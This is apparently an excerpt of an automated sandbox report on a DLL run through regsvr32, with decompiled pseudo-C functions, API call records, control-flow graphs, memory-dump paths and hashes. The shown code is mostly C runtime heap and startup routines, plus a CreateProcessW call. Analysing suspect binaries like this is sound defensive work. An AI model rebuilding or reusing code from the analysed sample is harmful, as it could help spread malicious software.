                                                                      				if (TranslateAcceleratorW(??, ??, ??) != 0) goto 0x80001f6e;
                                                                      				E00000001180002C50(0x80066306, _v3132 % r8d,  &_v3032, _t178);
                                                                      				TranslateMessage(??);
                                                                      				_t104 = DispatchMessageW(??);
                                                                      				goto 0x80001f02;
                                                                      				_v3036 = _t104;
                                                                      				goto 0x80001fa6;
                                                                      				goto 0x80001f91;
                                                                      				goto 0x80001f91;
                                                                      				goto 0x80001f96;
                                                                      				goto 0x80001f9b;
                                                                      				_v3036 = 1;
                                                                      				_v3144 = _v3036;
                                                                      				E00000001180002FB0(_v3036,  *(_t157 + _v3132 % r8d) & 0x000000ff, _v8 ^ _t173);
                                                                      				return _v3144;
                                                                      			}





































                                                                      0x180001c47
                                                                      0x180001c51
                                                                      0x180001c59
                                                                      0x180001c61
                                                                      0x180001c65
                                                                      0x180001c6a
                                                                      0x180001c6e
                                                                      0x180001c72
                                                                      0x180001c74
                                                                      0x180001c7a
                                                                      0x180001c86
                                                                      0x180001c8c
                                                                      0x180001c9b
                                                                      0x180001ca1
                                                                      0x180001ca6
                                                                      0x180001caf
                                                                      0x180001cb4
                                                                      0x180001cb9
                                                                      0x180001cd1
                                                                      0x180001cd7
                                                                      0x180001ce3
                                                                      0x180001cf3
                                                                      0x180001cfd
                                                                      0x180001d14
                                                                      0x180001d1a
                                                                      0x180001d31
                                                                      0x180001d37
                                                                      0x180001d42
                                                                      0x180001d47
                                                                      0x180001d52
                                                                      0x180001d58
                                                                      0x180001d63
                                                                      0x180001d68
                                                                      0x180001d71
                                                                      0x180001d7f
                                                                      0x180001d8d
                                                                      0x180001d9f
                                                                      0x180001daa
                                                                      0x180001db4
                                                                      0x180001db8
                                                                      0x180001dbd
                                                                      0x180001dc7
                                                                      0x180001dd8
                                                                      0x180001ddb
                                                                      0x180001deb
                                                                      0x180001df1
                                                                      0x180001df7
                                                                      0x180001e05
                                                                      0x180001e0b
                                                                      0x180001e17
                                                                      0x180001e1e
                                                                      0x180001e2e
                                                                      0x180001e35
                                                                      0x180001e40
                                                                      0x180001e4b
                                                                      0x180001e5b
                                                                      0x180001e6e
                                                                      0x180001e72
                                                                      0x180001e7d
                                                                      0x180001e83
                                                                      0x180001ea0
                                                                      0x180001eaa
                                                                      0x180001eae
                                                                      0x180001eba
                                                                      0x180001ec6
                                                                      0x180001ed1
                                                                      0x180001ee7
                                                                      0x180001eed
                                                                      0x180001ef8
                                                                      0x180001efd
                                                                      0x180001f0e
                                                                      0x180001f11
                                                                      0x180001f1d
                                                                      0x180001f40
                                                                      0x180001f4d
                                                                      0x180001f5a
                                                                      0x180001f68
                                                                      0x180001f6e
                                                                      0x180001f7b
                                                                      0x180001f82
                                                                      0x180001f87
                                                                      0x180001f8c
                                                                      0x180001f91
                                                                      0x180001f96
                                                                      0x180001f9b
                                                                      0x180001fad
                                                                      0x180001fbc
                                                                      0x180001fcc

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LoadString
                                                                      • String ID: 576688993$8192$MTGESTURES$MTGestures$^hTE8uMufYPTb7P$Q
                                                                      • API String ID: 2948472770-2698566557
                                                                      • Opcode ID: f57de99929afe0d3deadac944c8bedf1f8661e21be39201ffc57728a98476022
                                                                      • Instruction ID: 64176da641d3ad2b337e7ac1c73346998ba82896e4fc6e4ea1f10072e3a8f00e
                                                                      • Opcode Fuzzy Hash: f57de99929afe0d3deadac944c8bedf1f8661e21be39201ffc57728a98476022
                                                                      • Instruction Fuzzy Hash: 1E913432218A89C9E7A1DB15E4907EA77E1F78C7C5F508125F68987BA5DF3DC648CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 195 180003dbc-180003dc2 196 180003dc4-180003dc7 195->196 197 180003dfd-180003e07 195->197 199 180003df1-180003df8 196->199 200 180003dc9-180003dcc 196->200 198 180003d38-180003d4d 197->198 201 180003d5c-180003d76 call 1800030e8 198->201 202 180003d4f 198->202 203 180003c20-180003c3d call 180003148 199->203 204 180003de4 call 18000333c 200->204 205 180003dce-180003dd1 200->205 217 180003d78-180003dad call 1800032f8 call 1800040cc call 180004140 call 180003124 call 180003194 call 180003328 201->217 218 180003daf-180003dbb call 180003a34 201->218 207 180003d51-180003d5b 202->207 214 180003c42-180003c44 203->214 212 180003de9-180003df0 204->212 210 180003dd3-180003ddc 205->210 211 180003ddd call 180003364 205->211 216 180003de2 211->216 219 180003d12 214->219 220 180003c4a-180003c5f call 1800030e8 214->220 216->212 217->207 218->195 224 180003d14-180003d29 219->224 228 180003c65-180003c76 call 1800032ac 220->228 229 180003d2a-180003d37 call 180003a34 220->229 237 180003cc7-180003cd1 call 180003124 228->237 238 180003c78-180003c82 call 180004104 call 1800040bc call 1800040d8 228->238 229->198 237->219 247 180003cd3-180003cdf call 1800040fc 237->247 258 180003c87-180003c95 call 18002a6cc 238->258 256 180003ce1-180003ceb call 180003050 247->256 257 180003d05-180003d10 247->257 256->257 263 180003ced-180003cfb 256->263 257->224 262 180003c9a-180003c9c 258->262 262->237 264 180003c9e-180003ca5 __scrt_dllmain_after_initialize_c 262->264 263->257 264->237 265 180003ca7-180003cc4 call 18002a688 264->265 265->237
                                                                      C-Code - Quality: 100%
                                                                      			E00000001180003DBC(void* __edx) {
                                                                      				void* _t5;
                                                                      
                                                                      				_t5 = __edx;
                                                                      				if (_t5 == 0) goto 0x80003dfd;
                                                                      				if (_t5 == 0) goto 0x80003df1;
                                                                      				if (_t5 == 0) goto 0x80003de4;
                                                                      				if (__edx == 1) goto 0x80003ddd;
                                                                      				return 1;
                                                                      			}




                                                                      0x180003dc0
                                                                      0x180003dc2
                                                                      0x180003dc7
                                                                      0x180003dcc
                                                                      0x180003dd1
                                                                      0x180003ddc

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_initialize_crt__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 2924237428-0
                                                                      • Opcode ID: 57c8a64db1cfedc3c8bbcc63a990129c7f47849acda4e7f0cecc93c0b87b18a4
                                                                      • Instruction ID: 000ccaabd233fbb230c7ec3862b353653c52970b084bff1f98dfb6c2cc6a69a9
                                                                      • Opcode Fuzzy Hash: 57c8a64db1cfedc3c8bbcc63a990129c7f47849acda4e7f0cecc93c0b87b18a4
                                                                      • Instruction Fuzzy Hash: F551A03160564C8AFAE7EB63A8433D93299EB4E3C0F54C016BA4847797CE2EC74E8701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,000000018003C005,?,?,?,?,00000001800558AE,?,?,00000000,00000001800448EB,?,?,?), ref: 0000000180038807
                                                                      • FlsSetValue.KERNEL32(?,?,?,000000018003C005,?,?,?,?,00000001800558AE,?,?,00000000,00000001800448EB,?,?,?), ref: 000000018003883D
                                                                      • FlsSetValue.KERNEL32(?,?,?,000000018003C005,?,?,?,?,00000001800558AE,?,?,00000000,00000001800448EB,?,?,?), ref: 000000018003886A
                                                                      • FlsSetValue.KERNEL32(?,?,?,000000018003C005,?,?,?,?,00000001800558AE,?,?,00000000,00000001800448EB,?,?,?), ref: 000000018003887B
                                                                      • FlsSetValue.KERNEL32(?,?,?,000000018003C005,?,?,?,?,00000001800558AE,?,?,00000000,00000001800448EB,?,?,?), ref: 000000018003888C
                                                                      • SetLastError.KERNEL32(?,?,?,000000018003C005,?,?,?,?,00000001800558AE,?,?,00000000,00000001800448EB,?,?,?), ref: 00000001800388A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 45e7a3cf5adb8842d71e73c18f098c8f344b7df8d26ff4e90be3b49d4fa1ebdd
                                                                      • Instruction ID: 4883c82424be8c241d3e529ecf31aa74e39bff7bea0c7376f71a071419365241
                                                                      • Opcode Fuzzy Hash: 45e7a3cf5adb8842d71e73c18f098c8f344b7df8d26ff4e90be3b49d4fa1ebdd
                                                                      • Instruction Fuzzy Hash: D6119D3470034842FADBA73159913EAA3925F8C7F0F96C724B93647BD6DE2987899710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 550 28449a0-2844a63 call 2841a70 553 2844a65-2844ad1 call 285e478 550->553 554 2844ad7-2844b21 CreateProcessW 550->554 553->554
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: i
                                                                      • API String ID: 963392458-73350742
                                                                      • Opcode ID: 990718fdd28b0e1c14ec96ed622be2bdf27254edef1fb3e30e69fb9bbb6b97b7
                                                                      • Instruction ID: 47758eec7a5e2dca77180bfac70526de172286f02c5bb41bf79b5830f9d869dc
                                                                      • Opcode Fuzzy Hash: 990718fdd28b0e1c14ec96ed622be2bdf27254edef1fb3e30e69fb9bbb6b97b7
                                                                      • Instruction Fuzzy Hash: 97417C7091CB848FDBA8DF18D0C979AB7E0FB98315F20494EE88DC7245CB749984CB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 72%
                                                                      			E0000000118003A674(intOrPtr* __rax, void* __rcx) {
                                                                      				int _t1;
                                                                      				intOrPtr _t3;
                                                                      				void* _t4;
                                                                      				void* _t11;
                                                                      				intOrPtr _t14;
                                                                      
                                                                      				if (__rcx == 0) goto 0x8003a6af;
                                                                      				_t14 =  *0x80073d08; // 0xf00000, executed
                                                                      				_t1 = HeapFree(_t11, ??); // executed
                                                                      				if (_t1 != 0) goto 0x8003a6aa;
                                                                      				_t3 = E0000000118003C174(GetLastError(), __rax, _t14, __rcx);
                                                                      				_t4 = E0000000118003BFFC(_t1, __rax);
                                                                      				 *__rax = _t3;
                                                                      				return _t4;
                                                                      			}








                                                                      0x18003a677
                                                                      0x18003a683
                                                                      0x18003a68a
                                                                      0x18003a692
                                                                      0x18003a69c
                                                                      0x18003a6a3
                                                                      0x18003a6a8
                                                                      0x18003a6af

                                                                      APIs
                                                                      • RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,000000018004F9D6,?,?,?,000000018004F4BB,?,?,00000000,00000001800473F4,?,?,?,00000001800472FF), ref: 000000018003A68A
                                                                      • GetLastError.KERNEL32(?,?,?,000000018004F9D6,?,?,?,000000018004F4BB,?,?,00000000,00000001800473F4,?,?,?,00000001800472FF), ref: 000000018003A694
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: BoundaryDeleteDescriptorErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2050971199-0
                                                                      • Opcode ID: 6e19004825d7ee1ba0c251f92e4dbbadfe5123e793117f5940b7710eac323e0a
                                                                      • Instruction ID: 1d23c876bd3d4e797824c4f970f92295e28ad0801dfa1089904eba328da5daea
                                                                      • Opcode Fuzzy Hash: 6e19004825d7ee1ba0c251f92e4dbbadfe5123e793117f5940b7710eac323e0a
                                                                      • Instruction Fuzzy Hash: 22E08CB0B0024842FF9BABB29C463E633519F8EBC0F05C020B91582362EE288B8D4700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00000001180047A0C(void* __ecx, void* __edx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rsi;
                                                                      				_a24 = __rdi;
                                                                      				if (__ecx - 0x2000 < 0) goto 0x80047a54;
                                                                      				E0000000118003BFFC(__ecx - 0x2000, __rax);
                                                                      				 *__rax = 9;
                                                                      				E0000000118003A794();
                                                                      				return 9;
                                                                      			}



                                                                      0x180047a0c
                                                                      0x180047a11
                                                                      0x180047a16
                                                                      0x180047a29
                                                                      0x180047a2b
                                                                      0x180047a35
                                                                      0x180047a37
                                                                      0x180047a53

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 4e32b7200c4d39d2f55d64b392fd00ec54d8dfefc028d49a60426d253769fa0c
                                                                      • Instruction ID: ab81d77d7176c1463f3ec3f031e0104f8a52440c8302fd3f07cf4b0be3fb1ebd
                                                                      • Opcode Fuzzy Hash: 4e32b7200c4d39d2f55d64b392fd00ec54d8dfefc028d49a60426d253769fa0c
                                                                      • Instruction Fuzzy Hash: D911C132204A4882F3929B14E4807DE63A0F38C7C4F568824F699477A3DF38CB28CB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 46%
                                                                      			E0000000118003C1F4(void* __eax, signed int __rcx, signed int __rdx, void* __r10) {
                                                                      				intOrPtr* _t22;
                                                                      				signed int _t29;
                                                                      
                                                                      				_t29 = __rdx;
                                                                      				if (__rcx == 0) goto 0x8003c213;
                                                                      				_t1 = _t29 - 0x20; // -32
                                                                      				_t22 = _t1;
                                                                      				if (_t22 - __rdx < 0) goto 0x8003c256;
                                                                      				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                                                      				goto 0x8003c23a;
                                                                      				if (E00000001180049264() == 0) goto 0x8003c256;
                                                                      				if (E0000000118003ADD4(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x8003c256;
                                                                      				RtlAllocateHeap(??, ??, ??); // executed
                                                                      				if (_t22 == 0) goto 0x8003c225;
                                                                      				goto 0x8003c263;
                                                                      				E0000000118003BFFC(_t22, _t22);
                                                                      				 *_t22 = 0xc;
                                                                      				return 0;
                                                                      			}





                                                                      0x18003c1f4
                                                                      0x18003c203
                                                                      0x18003c207
                                                                      0x18003c207
                                                                      0x18003c211
                                                                      0x18003c21f
                                                                      0x18003c223
                                                                      0x18003c22c
                                                                      0x18003c238
                                                                      0x18003c249
                                                                      0x18003c252
                                                                      0x18003c254
                                                                      0x18003c256
                                                                      0x18003c25b
                                                                      0x18003c268

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,000000018003885A,?,?,?,000000018003C005,?,?,?,?,00000001800558AE,?,?,00000000), ref: 000000018003C249
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 88634052ba2b47f5097bfe839caf685067128a109a3935e6c9e3468a09f404d7
                                                                      • Instruction ID: 9ccdb166f51ee32887a5f8ff12a800483d12f9a94f79e091e60c28d4a41f1522
                                                                      • Opcode Fuzzy Hash: 88634052ba2b47f5097bfe839caf685067128a109a3935e6c9e3468a09f404d7
                                                                      • Instruction Fuzzy Hash: 63F06D7470160845FEE757E29941BE753814B8EBC0F0EC430690AC67C2EE1CC6894325
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 46%
                                                                      			E0000000118003C378(intOrPtr* __rax, void* __rcx, void* __r10) {
                                                                      
                                                                      				if (__rcx - 0xffffffe0 > 0) goto 0x8003c3c3;
                                                                      				_t16 =  ==  ? __rax : __rcx;
                                                                      				goto 0x8003c3aa;
                                                                      				if (E00000001180049264() == 0) goto 0x8003c3c3;
                                                                      				if (E0000000118003ADD4(__rax,  ==  ? __rax : __rcx) == 0) goto 0x8003c3c3;
                                                                      				RtlAllocateHeap(??, ??, ??); // executed
                                                                      				if (__rax == 0) goto 0x8003c395;
                                                                      				goto 0x8003c3d0;
                                                                      				E0000000118003BFFC(__rax, __rax);
                                                                      				 *__rax = 0xc;
                                                                      				return 0;
                                                                      			}



                                                                      0x18003c385
                                                                      0x18003c38f
                                                                      0x18003c393
                                                                      0x18003c39c
                                                                      0x18003c3a8
                                                                      0x18003c3b6
                                                                      0x18003c3bf
                                                                      0x18003c3c1
                                                                      0x18003c3c3
                                                                      0x18003c3c8
                                                                      0x18003c3d5

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,?,?,0000000180055895,?,?,00000000,00000001800448EB,?,?,?,0000000180029703,?,?,?,0000000180029AB5), ref: 000000018003C3B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 7fb39684b084208d4e2a5b1a1038e3f84aa6176c42a51033ad16340b8f51e4a2
                                                                      • Instruction ID: b4fb2e3c4cbfaddfe3022d7a8ac8a4851c607c3282e496e9c9463dab183fc563
                                                                      • Opcode Fuzzy Hash: 7fb39684b084208d4e2a5b1a1038e3f84aa6176c42a51033ad16340b8f51e4a2
                                                                      • Instruction Fuzzy Hash: 18F0127170524C45FAE767615941BEB23804B4C7E0F0AD6207D66D62C2DE6C87884712
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E00000001180031B10(signed int __rbx, signed int* __rcx, intOrPtr* __rdx, void* __r10, void* __r11) {
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				void* __r12;
                                                                      				void* __r14;
                                                                      				intOrPtr _t426;
                                                                      				signed int _t464;
                                                                      				signed int _t471;
                                                                      				signed long long _t503;
                                                                      				intOrPtr _t511;
                                                                      				unsigned int _t521;
                                                                      				unsigned int _t530;
                                                                      				unsigned int _t539;
                                                                      				signed int _t556;
                                                                      				unsigned int _t576;
                                                                      				unsigned int _t588;
                                                                      				signed int _t601;
                                                                      				signed int _t610;
                                                                      				signed int _t622;
                                                                      				signed int _t623;
                                                                      				signed int _t624;
                                                                      				signed int _t626;
                                                                      				unsigned int _t633;
                                                                      				signed int _t639;
                                                                      				unsigned int _t641;
                                                                      				signed int _t656;
                                                                      				signed int _t695;
                                                                      				signed int _t698;
                                                                      				signed int _t699;
                                                                      				void* _t704;
                                                                      				void* _t709;
                                                                      				void* _t777;
                                                                      				void* _t781;
                                                                      				void* _t785;
                                                                      				void* _t788;
                                                                      				void* _t789;
                                                                      				signed int _t792;
                                                                      				signed int _t793;
                                                                      				signed int _t797;
                                                                      				signed long long _t800;
                                                                      				signed long long _t802;
                                                                      				signed long long _t807;
                                                                      				signed long long _t808;
                                                                      				signed long long* _t809;
                                                                      				signed long long* _t812;
                                                                      				signed long long* _t815;
                                                                      				signed long long _t819;
                                                                      				signed long long _t836;
                                                                      				signed long long _t837;
                                                                      				signed long long* _t838;
                                                                      				signed long long* _t839;
                                                                      				void* _t842;
                                                                      				signed long long _t860;
                                                                      				signed long long _t864;
                                                                      				signed long long* _t865;
                                                                      				signed long long _t869;
                                                                      				void* _t909;
                                                                      				void* _t994;
                                                                      				void* _t996;
                                                                      				long long* _t997;
                                                                      				void* _t999;
                                                                      				void* _t1000;
                                                                      				void* _t1002;
                                                                      				void* _t1003;
                                                                      				void* _t1033;
                                                                      				void* _t1035;
                                                                      				void* _t1037;
                                                                      				void* _t1039;
                                                                      				intOrPtr* _t1040;
                                                                      				signed long long _t1043;
                                                                      
                                                                      				_t1032 = __r11;
                                                                      				_t1031 = __r10;
                                                                      				 *((long long*)(_t1002 + 8)) = __rbx;
                                                                      				_t1000 = _t1002 - 0x20;
                                                                      				_t1003 = _t1002 - 0x120;
                                                                      				_t426 =  *0x800738a8; // 0x0
                                                                      				_t1040 = __rdx;
                                                                      				 *(_t1003 + 0x40) =  *(_t1003 + 0x40) & 0x00000000;
                                                                      				_t997 = __rcx;
                                                                      				 *((intOrPtr*)(_t1000 - 0x68)) = _t426 -  *0x800738b0;
                                                                      				 *(_t1003 + 0x48) = 0;
                                                                      				_t699 = E000000011800329B8(__rcx, __r10, __r11);
                                                                      				if ( *__rdx == 0) goto 0x80031b6f;
                                                                      				if (( *(__rdx + 8) & 0x00000200) == 0) goto 0x80031b6f;
                                                                      				 *(_t1000 + 0x78) = 1;
                                                                      				goto 0x80031b72;
                                                                      				 *(_t1000 + 0x78) =  *(_t1000 + 0x78) & 0;
                                                                      				if (_t699 != 0xffff) goto 0x80031b89;
                                                                      				__rcx[2] = __rcx[2] & 0;
                                                                      				 *__rcx =  *__rcx & __rbx;
                                                                      				__rcx[2] = 2;
                                                                      				goto 0x80032997;
                                                                      				if (_t699 != 0xfffe) goto 0x80031bb6;
                                                                      				 *(_t1003 + 0x58) =  *(_t1003 + 0x58) & 0;
                                                                      				_t1005 = __rdx;
                                                                      				 *(_t1003 + 0x50) = 0x8005fee0;
                                                                      				_t842 = _t1003 + 0x50;
                                                                      				E0000000118002E98C(_t842, __rcx, __rdx);
                                                                      				goto 0x80032997;
                                                                      				_t704 = _t699 - 0xfffd;
                                                                      				if (_t704 != 0) goto 0x80031bca;
                                                                      				 *_t997 = 0x8005fee0;
                                                                      				goto 0x80032994;
                                                                      				r14d = _t699;
                                                                      				r13d = 0x6000;
                                                                      				r14d = r14d & 0x00008000;
                                                                      				if (_t704 == 0) goto 0x80032461;
                                                                      				r12d = _t699;
                                                                      				r12d = r12d & 0x00001800;
                                                                      				r13d = 0x1000;
                                                                      				 *(_t1000 + 0x70) = 0 | r12d == 0x00000800;
                                                                      				 *(_t1000 + 0x68) = 0 | (r13d & _t699) == 0x00000000;
                                                                      				r13d =  ==  ? 0x400 : r13d;
                                                                      				r13d = r13d & _t699;
                                                                      				 *(_t1000 - 0x6c) = r13d;
                                                                      				if (r12d == 0x800) goto 0x80031c44;
                                                                      				_t30 = _t842 - 0x1000; // -4096
                                                                      				if ((_t30 & 0xfffffcff) != 0) goto 0x80031c44;
                                                                      				_t709 = (_t699 & 0x00001b00) - 0x1300;
                                                                      				if (_t709 != 0) goto 0x8003245b;
                                                                      				asm("bt edi, 0xe");
                                                                      				if (_t709 >= 0) goto 0x80031cbb;
                                                                      				_t633 =  *0x800738b8; // 0x0
                                                                      				if (( !((_t633 >> 0x00000002 |  *0x800738b8) >> 1) & 0x00000001) == 0) goto 0x80031ca8;
                                                                      				E00000001180032D48(0,  !((_t633 >> 0x00000002 |  *0x800738b8) >> 1), 0x8005fee0, __rbx, _t1003 + 0x30, _t994, _t997, _t1005, _t1033, _t1037, _t1039);
                                                                      				 *(_t1003 + 0x70) =  *(_t1003 + 0x70) & 0x00000000;
                                                                      				 *(_t1003 + 0x78) =  *(_t1003 + 0x78) & 0x00000000;
                                                                      				E0000000118002EE78(0x20, 0x8005fee0, 0x8005fee0, _t1003 + 0x70);
                                                                      				E0000000118002E98C(_t1003 + 0x70, _t1003 + 0x50, 0x8005fee0);
                                                                      				_t800 =  *(_t1003 + 0x50);
                                                                      				 *(_t1003 + 0x40) = _t800;
                                                                      				goto 0x80031cb7;
